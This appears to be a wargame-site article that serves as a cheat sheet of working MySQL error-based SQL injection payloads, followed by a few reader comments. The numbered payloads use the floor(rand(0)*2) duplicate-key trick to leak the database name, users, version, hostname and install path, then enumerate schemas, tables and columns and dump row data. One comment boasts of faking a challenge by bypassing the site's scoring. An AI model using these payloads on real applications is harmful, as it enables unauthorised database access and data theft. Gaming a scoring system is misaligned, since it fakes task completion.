RTB WarGames Challenge Article 1
But since you clicked it anyway:
The following are error-based, MySQL-specific injections for string-type parameters. Every one of them uses the same double-query trick: floor(rand(0)*2) is used as a group by key, the rand(0) sequence is deterministic and makes that key collide while MySQL builds its temporary grouping table, and the server aborts with a "Duplicate entry '...' for key 'group_key'" error whose duplicated value is whatever was concat()'d onto the key, i.e. the result of the inner subquery. The 0x7e,0x27 and 0x27,0x7e bytes wrap that result in ~' and '~ so it is easy to pick out of the error text.
The data is returned through Hex() and cast() to make the query more reliable and to avoid bad-character and format-string issues; database and table names in the WHERE clauses are supplied as 0x... hex literals for the same reason (no quotes needed). These injections depend entirely on the information_schema database (MySQL 5.0 and later) and on the application actually displaying the MySQL error to the user.
All data comes back in hexadecimal; simply decode it to ASCII. Keep in mind that the server truncates the value it echoes in the duplicate-entry message (64 characters on older 5.x servers) and Hex() doubles the length of the data, so long values have to be read in substr() slices.
1. To select the current database
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2. To find the current user
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
3. To find MySQL Version
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
5. To find the system user
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
6. To find the hostname
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
7. To find the installation directory
(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
8. To find the DB User
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
9. To find the databases
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Note: Keep incrementing the capitalized LIMIT for successive database names, as below
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
...
10. To count the number of tables in the selected database
Note: Replace the 0xHEX-CODE-OF-DATABASE-NAME placeholder with the hex encoding of the database name, written as a 0x... literal so that no quotes are needed. The count is returned as a plain decimal number, not hex.
(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0xHEX-CODE-OF-DATABASE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
11. To get the table names in the selected database
Note: Keep incrementing the capitalized LIMIT below for successive table names
Replace 0xHEX-CODE-OF- string with appropriate value
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX-CODE-OF-DATABASE-NAME LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
12. To get number of columns in the selected table name
Note: Replace 0xHEX-CODE-OF- strings with appropriate value
(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM information_schema.columns WHERE table_schema=0xHEX-CODE-OF-DATABASE-NAME AND table_name=0xHEX-CODE-OF-TABLE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
13. To get column names of a selected table name
Note: Keep incrementing the capitalized LIMIT below for successive column names
Replace 0xHEX-CODE-OF- strings with appropriate value
(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xHEX-CODE-OF-DATABASE-NAME AND table_name=0xHEX-CODE-OF-TABLE-NAME LIMIT 0,1 )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
14. To count the number of records in a selected column
Note: Replace DATABASE-NAME and TABLE-NAME with the appropriate values. These are plain identifiers, not hex literals: a FROM clause takes table names, so 0x... encoding does not work here.
(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM DATABASE-NAME.TABLE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
15. To fetch records from a selected column
Note: Replace DATABASE-NAME, both TABLE-NAME entries and COLUMN-NAME with appropriate value
Keep incrementing the capitalized LIMIT below for successive entries
(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(TABLE-NAME.COLUMN-NAME as char)),0x27,0x7e) FROM DATABASE-NAME.TABLE-NAME LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
End.
ghost 19 years ago
Didn't actually root or complete the challenge, but faked it by bypassing Grind's scoring system.
I'd suggest doing a little more organizing and planning before writing articles, but it's not bad.
ghost 19 years ago
Fuck, then I was a min late from you, skarecrow.. and lol, it was me who changed the backup.log file, so I thought everyone would get a messed-up password like that fuckin… anyways, great job skarecrow.. better luck next time
ghost 18 years ago
You used PuTTY as your SSH/telnet client; would something like HyperTerminal work too? Or another shell, bash perhaps?